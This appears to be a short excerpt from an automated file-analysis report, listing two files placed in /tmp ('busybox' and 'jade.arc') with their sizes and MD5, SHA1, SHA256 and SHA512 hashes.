652f8341e27f00272f3ee4164900c5f02e0c7c763b9edc0405107ce2126ce2c700c9318e3ea29a73125d77d4b16b961860a514b0580170d019976fa7765792d1

Download Submit
/tmp/busybox

Filesize
2.0MB

MD5
b4dede5fc0b1bad5cb8e901bde126b97

SHA1
10cbe9a418ad84a1ed297948539d37aeb58dd810

SHA256
a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

SHA512
45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

Download Submit
/tmp/jade.arc

Filesize
275B

MD5
cba0261779bc762dcaa59e48bca8c298

SHA1
f5747b8818b87d36e684c31ee32cae265ae63cd0

SHA256
52ea3a00ff42e925a9f1862b63765b9ac279abb244f7e43ac010e42c76fcc918

SHA512
f322ac8ba03308f52db0478080d60f419d2bc195d4eeccee0365fd66d13f99032c491f55ae952dd9685064825f07b5c8c381a68ca3928c22164009861b3da702

Download Submit